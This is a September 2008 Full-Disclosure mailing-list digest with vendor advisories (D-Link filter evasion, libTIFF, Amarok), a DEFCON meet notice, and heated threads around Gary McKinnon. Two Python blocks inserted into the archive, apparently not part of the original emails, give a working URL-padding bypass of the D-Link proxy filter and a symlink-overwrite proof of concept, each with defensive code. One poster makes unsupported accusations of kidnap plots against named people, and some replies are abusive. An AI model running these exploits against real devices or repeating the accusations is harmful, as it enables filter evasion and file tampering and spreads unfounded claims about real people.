> Consider adding the Marcus Sachs Youtube video onto the Free Gary blog
> as a case against sending Gary to the U.S. during the election season,
> which would only see Glasgow-born Gary paraded on CNN and Fox News
> during election coverage. :(
>
> I would like to see what your readers think about the video and Marcus
> Sachs's media agenda.
>
> http://www.youtube.com/watch?v=FSUPTZVlkyU
>
> From one Scot to another, I wish Gary luck and best wishes to his
> friends and family, you have my sympathy at this difficult time.
>
> After seeing the Youtube video, the timing and reason for fast
> tracking Gary is known more now than ever, and we have no doubt about
> Marcus Sachs and his intentions to use this fine Scottish born lad as
> a political baseball to score a home run.
>
> The Scots, we stick together in times of hardships, and this is one of
> those times that Gary needs friends and support from the security
> community more than ever.
>
> Please print these emails out for Gary to read, and download the
> Youtube video file onto a medium that he will be able to watch without
> his computer-use restriction order being breached.
>
> Here is a tool that will allow you to do it:
> http://www.download.com/YouTube-Downloader/3000-2071_4-10647340.html
>
> All the best,
>
> n3td3v
>
From xploitable at gmail.com Mon Sep 8 07:15:45 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 8 Sep 2008 07:15:45 +0100
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <a741a45f0809072126n3646512budd1adfb65e13474e@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <a741a45f0809072126n3646512budd1adfb65e13474e@mail.gmail.com>
Message-ID: <4b6ee9310809072315y4ed610a1n8944e53ad87b8a42@mail.gmail.com>

On Mon, Sep 8, 2008 at 5:26 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> While I think the US/media is making too much out of this (he was just some
> sucker scanning for Administrator/NULL and installing pcanywhere) I don't see
> why we should care too much, he is a nobody - just some overaged kiddie with
> a scanner and some downloaded exez. He didn't use any skill and as best I can
> tell (from the media) he didn't access anything interesting except for an
> image of a UFO (of which, surprise surprise, he has no proof).
>

E-mail this to your favorite BBC Radio 1 DJs http://www.bbc.co.uk/radio1/djs/, get it played on the air!!!

http://www.h2kradio.com/Method%20-%20Gary%20Mckinnon%20Hacker%20Tribute.mp3

It's by Method, I found it on Youtube http://www.youtube.com/user/methodh2k

All the best,

n3td3v

From maru at scip.ch Mon Sep 8 09:13:44 2008
From: maru at scip.ch (Marc Ruef)
Date: Mon, 08 Sep 2008 10:13:44 +0200
Subject: [Full-disclosure] [scip_Advisory 3808] D-Link DIR-100 long url filter evasion
Message-ID: <48C4DEB8.9030302@scip.ch>

D-Link DIR-100 long url filter evasion

scip AG Vulnerability ID 3808 (09/08/2008)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3808

I.
INTRODUCTION

D-Link DIR-100 is a small and cost-effective router and firewall device
for small offices and home users. More details are available at the
official product web site (German link):

http://www.dlink.de/?go=gNTyP9CgrdFOIC4AStFCF834mptYKO9ZTdvhLPG3yV3oV492gqltbNlwaaFp6DQoHDrpxC5H+40AAdvl

II. DESCRIPTION

Marc Ruef at scip AG found a way to evade the URL filters of the
integrated web proxy, which are meant to prevent access to web sites. An
attacker can append a very long string to the URL and reach web
resources although access to them is forbidden.

This problem could be verified in all firmware versions up to v1.12. A
similar vulnerability was found years ago in a comparable device, the
Netgear RP114. [1, 2]

III. EXPLOITATION

It is possible to exploit the vulnerability with a common web browser by
using a long URL (approx. 1'300 chars). The length of the URL can be
extended by adding an unused HTTP GET request parameter. Example URL:

http://www.scip.ch/?foo=aaa(...)

A video illustrating this issue is available at the following URL:

http://de.youtube.com/watch?v=WTzPn37XNl4

The Attack Tool Kit (ATK) [3] is able to exploit this vulnerability with
the following generic ASL code (expand the long URL request):

open|send GET http://www.scip.ch/?foo=aaa(...) HTTP/1.0\n\n|sleep|close|pattern_not_exists *This URL is <font color=red>blocked</font> by administrator !*

IV. IMPACT

With this vulnerability users are able to access forbidden web resources
without being filtered by the integrated web proxy service.

V. DETECTION

Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement.

VI. SOLUTION

We informed D-Link at an early stage. Our technical requests were neither
answered nor confirmed. Therefore no official statement, patch or upgrade
is available. We suggest using another device to filter forbidden web
resources successfully.

VII.
VENDOR RESPONSE

D-Link was first informed via the inconvenient web form at
http://www.dlink.com (no public mail address for such cases could be
found). The first responses claimed that the problem must be caused by a
wrong configuration setting. Further discussions were initiated. The
support was not able to understand the problem, not even after several
step-by-step guides and examples. They kept suggesting that I upgrade to
the latest firmware and said they could not verify the problem.
Therefore, no official solution, workaround or patch is available.

VIII. SOURCES

scip AG - Security Consulting Information Process (german)
http://www.scip.ch/

scip AG Vulnerability Database (german)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3808

computec.ch document data base (german)
http://www.computec.ch/download.php

IX. DISCLOSURE TIMELINE

2008/07/25 Identification of the vulnerability by Marc Ruef
2008/07/28 First information to D-Link via web form
2008/07/28 First reply by D-Link support via support at service.dlink.biz (ticket id 1375981)
2008/07/29 Providing our config for further analysis
2008/08/06 Request for actual status (no reply)
2008/08/29 Another request for actual status
2008/08/29 Response could not verify the problem
2008/09/01 Detailed explanation of the exploitation
2008/09/01 Responder could still not understand the problem
2008/09/08 Public disclosure of the advisory

X. CREDITS

The vulnerability was discovered by Marc Ruef.

Marc Ruef, scip AG, Zuerich, Switzerland
maru-at-scip.ch
http://www.scip.ch/

A1. BIBLIOGRAPHY

[1] http://www.securityfocus.com/bid/10404
[2] http://seclists.org/bugtraq/2004/May/0263.html
[3] http://www.computec.ch/projekte/atk/

A2. LEGAL NOTICES

Copyright (c) 2007-2008 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information.
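As an added example, not part of the scip advisory and not code from the ATK tool, the following Python script mirrors the ASL check in section III and the detection point in section V. It pads a request URL with an unused GET parameter (the name foo is taken from the advisory's example URL) until the URL is about 1'300 characters long, builds the raw HTTP/1.0 request, classifies a proxy's answer by the "blocked" marker the ASL pattern_not_exists step looks for, and flags proxy log lines whose request URL exceeds a length threshold. The block page, the normal page and the two log lines are constructed samples; the 1024-character detection threshold and the 10.0.0.5 client address are assumptions. send_probe() is the only part that talks to a network and is not used by the offline demo.

```python
import re
import socket
from urllib.parse import urlsplit

# Block-page marker the ASL "pattern_not_exists" step in the advisory looks for.
BLOCK_MARKER = "This URL is <font color=red>blocked</font> by administrator !"
BLOCK_RE = re.compile(re.escape(BLOCK_MARKER))


def build_probe_url(base_url, target_len=1300, param="foo", fill="a"):
    """Extend base_url with an unused GET parameter (name from the advisory)
    until the whole URL is target_len characters long.  Only the length
    matters for the evasion, so the value is plain padding."""
    sep = "&" if urlsplit(base_url).query else "?"
    prefix = "%s%s%s=" % (base_url, sep, param)
    return prefix + fill * max(0, target_len - len(prefix))


def build_raw_request(url):
    """Proxy-style absolute-URI request, as the ASL 'send' step emits it."""
    return "GET %s HTTP/1.0\r\n\r\n" % url


def is_blocked(body):
    """True when the proxy answered with its block page."""
    return BLOCK_RE.search(body) is not None


def classify(short_body, long_body):
    """Compare the answers to the short URL and to the padded URL."""
    short_b, long_b = is_blocked(short_body), is_blocked(long_body)
    if short_b and not long_b:
        return "evasion"        # short URL filtered, long one let through
    if short_b and long_b:
        return "filtered"
    return "not-filtered"       # nothing to bypass: URL not on the block list


def send_probe(proxy_host, proxy_port, url, timeout=5.0):
    """Live check (not used by the offline demo): send the raw request
    through the device and return the response as text."""
    with socket.create_connection((proxy_host, proxy_port), timeout) as s:
        s.sendall(build_raw_request(url).encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


# Detection (section V): over-long request URLs in proxy / IDS logs.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/1\.[01]"')


def flag_long_urls(log_lines, threshold=1024):
    """(line_no, url_len) for every log line whose URL exceeds threshold.
    1024 is an assumed cut-off; tune it to the longest legitimate URL seen."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.search(line)
        if m and len(m.group(1)) > threshold:
            hits.append((n, len(m.group(1))))
    return hits


# Constructed samples: a block page, a normal page and two CLF-style log lines.
SAMPLE_BLOCK_PAGE = "<html><body>%s</body></html>" % BLOCK_MARKER
SAMPLE_OK_PAGE = "<html><head><title>scip AG</title></head></html>"
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Sep/2008:10:13:44 +0200] "GET http://www.scip.ch/ HTTP/1.0" 403 512',
    '10.0.0.5 - - [08/Sep/2008:10:13:51 +0200] "GET %s HTTP/1.0" 200 8192'
    % build_probe_url("http://www.scip.ch/"),
]

if __name__ == "__main__":
    print(classify(SAMPLE_BLOCK_PAGE, SAMPLE_OK_PAGE))   # evasion
    print(flag_long_urls(SAMPLE_LOG))                    # [(2, 1300)]
```

Against a real device, call send_probe() twice through the router with the short and the padded URL and hand both bodies to classify(); an "evasion" result reproduces the advisory. For detection, a length threshold is the cheapest pattern, but a filter that compares only a prefix of the URL should be treated as broken rather than detected around: replace the device, as section VI recommends.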
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect
or consequential loss or damage from use of or reliance on this advisory.

From xploitable at gmail.com Mon Sep 8 10:59:10 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 8 Sep 2008 10:59:10 +0100
Subject: [Full-disclosure] Monthly Hands-On Meetups
In-Reply-To: <6158bb410809071830w2418cb3aqfbb5b5c34d9572fe@mail.gmail.com>
References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com>
	<6158bb410809071830w2418cb3aqfbb5b5c34d9572fe@mail.gmail.com>
Message-ID: <4b6ee9310809080259x6438d80fl9994f511fbcff1a2@mail.gmail.com>

On Mon, Sep 8, 2008 at 2:30 AM, Ureleet <ureleet at gmail.com> wrote:
> so u just want to meet n3td3v and flog him publicly? sounds good.
>

I already read a conversation between Joel Esler and his buddies on #pauldotcom that this idea was in the works, except for them it is a critical mistake, because I saved the IRC transcript to show the police if something does happen offline.

Many people from the #pauldotcom channel came to me with the information that was talked about in the #pauldotcom IRC channel, that they were planning something, then this thread appeared a couple of weeks later; maybe some of these aliases aren't just kids and there are security professionals behind them trying to influence the system to their own advantage.

People might be upset with me for speaking out for what I believe in, but Joel Esler, he posted a private email I sent to the Sans handlers at sans.org into the ##security IRC channel without permission, then he made a joke about aviation security on a Sans handlers podcast, and then threats to my personal safety were made by his friends in #pauldotcom, which was talked about in the public IRC channel in front of 60+ users.
What they had forgotten is, n3td3v is well networked in the security community and well dug in; people brought me the information that I was being talked about in #pauldotcom. It wasn't some layabout kids, it's a security professionals' channel for the pauldotcom.com podcast... they hold some little grudge against me for being so outspoken on Full-Disclosure about whatever I talk about on a particular day.

The transcript said they were plotting to trick n3td3v into meeting up with me, and somehow harm me physically and possibly kidnap me to a place where the general public could not see and hear, and do something to n3td3v. This was a critical mistake on their part, as n3td3v is well networked and dug in, and things like that get back to me pretty quick, and if they thought I wasn't going to put it on Full-Disclosure about the threat, then they have made a mistake.

A picture is building up about Joel Esler and the Sans handlers IRC circle, a very shadowy picture... this may be a joke thread by someone unrelated, nothing to do with n3td3v, but it's a bit of a coincidence, but the intelligence picture is building up nicely. I'm in contact with important people and all this information is gathered by people who hang about the same IRC channels as them and the information is sent to me.

He thinks Marcus Sachs is innocent, he said he knows Marcus Sachs, he wouldn't do anything like plot a false flag to influence the next administration. I laughed at how young and gullible he sounded trying to stick up for Marcus Sachs when the Youtube video is out there for anyone to watch.

The #pauldotcom comments were taken seriously by n3td3v and are currently part of an investigation to make sure the comments stay comments and aren't taken any further into the offline world.
The bottom line is, these Sans handlers are power hungry and political, they don't like someone like me getting in the way of their plans to artificially ramp up cyber security as a national security agenda item, as their Sans Internet Storm Center Director, none other than Marcus Sachs, said on Youtube. The Sans Internet Storm Center Director is a twat and there will be no false flags or artificially ramping up cyber security as a national security item on my watch. Each and every time you try and ramp something up I'll post about it on Full-Disclosure, make sure the public know exactly what is going on with you guys. Arrange a meet up with n3td3v, kidnap me because I'm getting in the way of your plans, but at least the public will know why n3td3v was kidnapped and harmed, it's because you guys had something to do with it.

Joel Esler, in a private IRC message with me when I questioned him about the #pauldotcom comments, threatened me that if I didn't stop posting on Full-Disclosure something would happen to me, in the same conversation flow about the #pauldotcom comments meet up plot. I told him, and what are you going to do if I don't stop posting to Full-Disclosure? He never replied. I then said I wasn't going to stop posting to Full-Disclosure, at which point I disconnected from the IRC conversation.

They then banned the nickname "roguebot" from #pauldotcom, which they were paranoid had been used to get the information about the meet up with n3td3v plot back to me. Because they were paranoid that their channel was springing leaks and giving intelligence to me, they saw roguebot was using mibbit.com and were straight away paranoid about it. I knew threats were going to start happening as soon as I got in the way of their cyber plans, never mind, this e-mail exposes the true nature of the Sans handlers.
I'm sure some of the handlers aren't all power hungry and I feel sorry for them getting branded with the same brush, but that's what the rogue elements of the security industry and the ISC storm center have created, I'm just the messenger reporting about it. Like I said, it's not all the Sans handlers, but rogue elements within it, people that have been monitored on IRC by various people and private messages I've had with Joel Esler.

Like any organization, there are bad apples inside each. There are bad apples inside Sans as well, plotting their way to get a bigger chunk of the power and money. I used to think, these guys are just Sans handlers, out to post helpful information on their diary, but something far bigger is going on politically and it's something that's got to be kept an eye on.

It all started one day when I e-mailed them and caused offense and it was later posted by Joel Esler on IRC that alarm bells started ringing about the nature of some of the people who volunteer for Sans internet storm center being more sinister under the surface than can be seen on the surface.

They will try and say I'm some kid that forgot to take his meds, but the truth is known by n3td3v, and everyone else who witnessed the comments posted on #pauldotcom. Valdis is also part of the same IRC circle with the Sans handlers, so he will probably come trying to support them, as n3td3v believes he is part of the ramping up cyber security thing.

If they are willing to lock up Gary Mckinnon for 60 years to get power and money, then they are capable of absolutely anything.
All the best,

n3td3v

From majormal at pirate-radio.org Mon Sep 8 10:44:16 2008
From: majormal at pirate-radio.org (Major Malfunction)
Date: Mon, 08 Sep 2008 10:44:16 +0100
Subject: [Full-disclosure] DEFCON London - DC4420 - September meet this Thursday 11th
Message-ID: <48C4F3F0.5030806@pirate-radio.org>

yes, we've recovered enough from the rigours of DC16 to be able to scrape together another London meet, this Thursday, at the Glassblower...

http://www.beerintheevening.com/pubs/s/20/2081/Glassblower/Piccadilly

as usual, we have our own room with its own bar (1st floor, with its own entrance from the street or from the back of the downstairs bar).

as well as real ales and wife beater, good food is also available but last food orders are strictly at 21:00, so make sure you get yours in in plenty of time and don't go hungry like i did last time!!! :P

meet starts at 19:00, talks at 19:30

this month we have:

DEFCON badges - i will go through some of the cool stuff you can do with these, including my own 'tv-be-a.d.d.' hack... i'll also have a couple of human badges to donate to whoever comes up with the coolest potential projects (and promise to come back and demo them!)

Merlin's DEFCON experience

Tompsci - Windows DLL trampolining

... and anyone else that feels like it on the night.

all are welcome, but don't forget we run Fight Club rules... if this is your first night, you *will* talk... ;>

cheers,
MM

-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

From Valdis.Kletnieks at vt.edu Mon Sep 8 16:16:00 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 08 Sep 2008 11:16:00 -0400
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: Your message of "Sun, 07 Sep 2008 22:57:11 BST."
	<4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com>
	<4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com>
	<4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com>
	<8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com>
	<4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com>
Message-ID: <21600.1220886960@turing-police.cc.vt.edu>

On Sun, 07 Sep 2008 22:57:11 BST, n3td3v said:
> How much will it cost to fly him over to U.S, keep him in prison,
> watered and fed?

As a percentage of the total US federal government budget, it's merely a
grain of sand on the beach. Nobody gives a flying f**k in a rolling donut
about one more guy in prison, we've already got several million there
already and one more will make a 0.000005% difference in our prison budget.

> Is the U.S not already in a recession, have they
> really got the money to ramp up somebody's crime to give a false

It may come as a surprise, but there are many economically challenged
areas in the US that will *welcome* a new prison, because that means jobs
for prison guards. If your local unemployment rate is hanging around
10-15% because of a lack of major industry in the area, a prison starts
looking pretty good...

> impression to the presidency that computer hacking needs to be a
> national security agenda for the next administration to worry
> about?.... really I don't think hackers are a national security item
> for a president to worry about...

Good. Now that you've said that, can you please shut the fuck up about
cyber warfare, whether it's government sponsored or grassroots movement?

For the record, although any single hacking case probably isn't the
President's job, unless it's a highly visible one like the McKinnon case,
the question of what policies/directives should be issued to deal with the
general question *is* the President's job.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/4630651b/attachment.bin

From kkaawwaa at gmail.com Mon Sep 8 17:38:50 2008
From: kkaawwaa at gmail.com (kkaawwaa at gmail.com)
Date: Tue, 09 Sep 2008 01:38:50 +0900
Subject: [Full-disclosure] [funsec] Internet attacks against Georgian web sites
In-Reply-To: <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com>
References: <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com>
	<6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com>
Message-ID: <20080909013830.B88A.D5B8A56D@gmail.com>

Thank you too.

On Sun, 7 Sep 2008 21:41:29 -0400
Ureleet <ureleet at gmail.com> wrote:

> drink yourself to death. thank you.
>
> On Thu, Aug 28, 2008 at 3:42 PM, n3td3v <xploitable at gmail.com> wrote:
> > On Thu, Aug 28, 2008 at 8:33 PM, n3td3v <xploitable at gmail.com> wrote:
> >> Putin blames US for Georgia role
> >>
> >> Russian Prime Minister Vladimir Putin has accused the US of provoking
> >> the conflict in Georgia, possibly for domestic election purposes.
> >>
> >> Mr Putin told CNN US citizens were "in the area" during the conflict
> >> over South Ossetia and were "taking direct orders from their leaders".
> >>
> >> He said his defence officials had told him the provocation was to
> >> benefit one of the US presidential candidates.
> >>
> >> The White House dismissed the allegations as "not rational".
> >>
> >> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm
> >>
> >
> > "The suspicion arises that someone in the United States especially
> > created this conflict with the aim of making the situation more tense
> > and creating a competitive advantage for one of the candidates
> > fighting for the post of US president."
> >
> > White House spokeswoman Dana Perino rejected the allegation.
> >
> > "To suggest that the United States orchestrated this on behalf of a
> > political candidate - it sounds not rational," she said.
> >
> > http://news.bbc.co.uk/1/hi/world/europe/7586605.stm
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
<kkaawwaa at gmail.com>

From py at gentoo.org Mon Sep 8 18:57:53 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 08 Sep 2008 19:57:53 +0200
Subject: [Full-disclosure] [ GLSA 200809-07 ] libTIFF: User-assisted execution of arbitrary code
Message-ID: <48C567A1.3020602@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200809-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libTIFF: User-assisted execution of arbitrary code
      Date: September 08, 2008
      Bugs: #234080
        ID: 200809-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple buffer underflow vulnerabilities in libTIFF may allow for the
remote execution of arbitrary code.

Background
==========

libTIFF provides support for reading and manipulating TIFF (Tagged Image
File Format) images.
Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  media-libs/tiff     < 3.8.2-r4                         >= 3.8.2-r4

Description
===========

Drew Yao (Apple Product Security) and Clay Wood reported multiple buffer
underflows in the LZWDecode() and LZWDecodeCompat() functions in
tif_lzw.c when processing TIFF files.

Impact
======

A remote attacker could entice a user to open a specially crafted TIFF
file with an application making use of libTIFF, possibly resulting in
the remote execution of arbitrary code with the privileges of the user
running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libTIFF users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/tiff-3.8.2-r4"

References
==========

  [ 1 ] CVE-2008-2327
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200809-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 260 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/2d50997d/attachment.bin

From py at gentoo.org Mon Sep 8 19:08:57 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 08 Sep 2008 20:08:57 +0200
Subject: [Full-disclosure] [ GLSA 200809-08 ] Amarok: Insecure temporary file creation
Message-ID: <48C56A39.5040305@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200809-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Amarok: Insecure temporary file creation
      Date: September 08, 2008
      Bugs: #234689
        ID: 200809-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Amarok uses temporary files in an insecure manner, allowing for a
symlink attack.

Background
==========

Amarok is an advanced music player.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  media-sound/amarok      < 1.4.10                         >= 1.4.10

Description
===========

Dwayne Litzenberger reported that the
MagnatuneBrowser::listDownloadComplete() function in
magnatunebrowser/magnatunebrowser.cpp uses the album_info.xml temporary
file in an insecure manner.

Impact
======

A local attacker could perform a symlink attack to overwrite arbitrary
files on the system with the privileges of the user running the
application.

Workaround
==========

There is no known workaround at this time.
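The class of bug this GLSA describes, shown as an added example in Python rather than Amarok's own C++ code: a predictable temporary file name opened for writing, beside the hardened forms. The attack runs entirely inside a throwaway sandbox directory that the script creates, with a constructed victim file standing in for whatever the local attacker wants overwritten. The file name album_info.xml is the one the advisory names; the directory, the XML payload and the victim file are assumptions. Nothing here is taken from the Amarok source or the Gentoo bug.

```python
import errno
import os
import shutil
import tempfile

# File name from the advisory; the directory it lives in is an assumption.
TMP_NAME = "album_info.xml"
PAYLOAD = "<album/>\n"          # constructed stand-in for the downloaded XML


def insecure_write(tmp_dir, data):
    """Vulnerable pattern: open a predictable path with O_CREAT|O_TRUNC.
    open() follows symlinks, so a link planted at that name redirects the
    write onto any file the user running the player can write."""
    path = os.path.join(tmp_dir, TMP_NAME)
    with open(path, "w") as f:
        f.write(data)
    return path


def secure_write(tmp_dir, data):
    """Hardened form with the same name: O_EXCL refuses an existing name
    (a dangling or live symlink counts as existing), O_NOFOLLOW refuses to
    follow one, and mode 0600 keeps other users from reading the result."""
    path = os.path.join(tmp_dir, TMP_NAME)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def secure_write_mkstemp(tmp_dir, data):
    """Preferred form: mkstemp picks an unpredictable name and opens it
    O_EXCL|0600 itself, so the attacker cannot plant anything in advance."""
    fd, path = tempfile.mkstemp(prefix="album_info.", suffix=".xml", dir=tmp_dir)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def plant_symlink(tmp_dir, victim):
    """The local attacker's move: a symlink at the predictable name,
    pointing at a file owned by the victim user."""
    os.symlink(victim, os.path.join(tmp_dir, TMP_NAME))


def read(path):
    with open(path) as f:
        return f.read()


def demo(sandbox=None):
    """Run the attack against both variants inside a sandbox; report results."""
    sandbox = sandbox or tempfile.mkdtemp(prefix="symlink-demo.")
    try:
        victim = os.path.join(sandbox, "victim.txt")   # constructed target
        with open(victim, "w") as f:
            f.write("original contents\n")
        tmp_dir = os.path.join(sandbox, "tmp")
        os.mkdir(tmp_dir)
        plant_symlink(tmp_dir, victim)

        insecure_write(tmp_dir, PAYLOAD)               # follows the link
        victim_after_insecure = read(victim)

        refused_errno = None
        try:
            secure_write(tmp_dir, PAYLOAD)             # must fail: link exists
        except OSError as e:
            refused_errno = e.errno

        clean_dir = os.path.join(sandbox, "clean")     # no attacker here
        os.mkdir(clean_dir)
        ok_path = secure_write(clean_dir, PAYLOAD)
        rnd_path = secure_write_mkstemp(clean_dir, PAYLOAD)
        return {
            "victim_clobbered": victim_after_insecure == PAYLOAD,
            "secure_refused": refused_errno in (errno.EEXIST, errno.ELOOP),
            "secure_ok_on_clean_dir": read(ok_path) == PAYLOAD,
            "mkstemp_name_differs": os.path.basename(rnd_path) != TMP_NAME,
            "mkstemp_mode": oct(os.stat(rnd_path).st_mode & 0o777),
        }
    finally:
        shutil.rmtree(sandbox, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-24s %s" % (key, value))
```

The same flags carry over directly to C: open(path, O_WRONLY|O_CREAT|O_EXCL|O_NOFOLLOW, 0600) fails with EEXIST when anything already sits at the name, and mkstemp(3) removes the predictable name altogether. Checking for the file's existence before opening it does not help; the window between the check and the open is exactly what the attacker races.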
Resolution
==========

All Amarok users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/amarok-1.4.10"

References
==========

  [ 1 ] CVE-2008-3699
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3699

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200809-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 260 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/e029642e/attachment.bin

From tecklord at securitylab.ru Mon Sep 8 20:43:17 2008
From: tecklord at securitylab.ru (Valery Marchuk)
Date: Mon, 8 Sep 2008 22:43:17 +0300
Subject: [Full-disclosure] WASC Announcement: 2007 Web Application Security Statistics Published
Message-ID: <AE7A8CA5427F43349FD2927AE721D8AC@gw1>

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2007. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape.

Goals

1. Identify the prevalence and probability of different vulnerability classes
2.
Compare testing methodologies against what types of vulnerabilities they are likely to identify.

The statistics were compiled from web application security assessment projects carried out by the following companies in 2007 (in alphabetical order):

- Booz Allen Hamilton
- BT
- Cenzic with Hailstorm and ClickToSecure
- dblogic.it
- HP Application Security Center with WebInspect
- Positive Technologies with MaxPatrol
- Veracode with Veracode Security Review
- WhiteHat Security with WhiteHat Sentinel

The overall statistics include analysis results of 32,717 sites and 69,476 vulnerabilities of different degrees of severity.

The detailed information can be found here:
http://www.webappsec.org/projects/statistics/

If you represent an organization that performs vulnerability assessments on websites, particularly on custom web applications, through a manual or automated process and would like to participate, please let us know. Please contact Sergey Gordeychik (statistics_at_webappsec.org).

Regards,

- statistics_at_webappsec.org
http://www.webappsec.org/
The Web Application Security Consortium

From kees at ubuntu.com Tue Sep 9 01:31:49 2008
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 8 Sep 2008 17:31:49 -0700
Subject: [Full-disclosure] [USN-641-1] Racoon vulnerabilities
Message-ID: <20080909003149.GJ26657@outflux.net>

===========================================================
Ubuntu Security Notice USN-641-1          September 09, 2008
ipsec-tools vulnerabilities
CVE-2008-3651, CVE-2008-3652
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
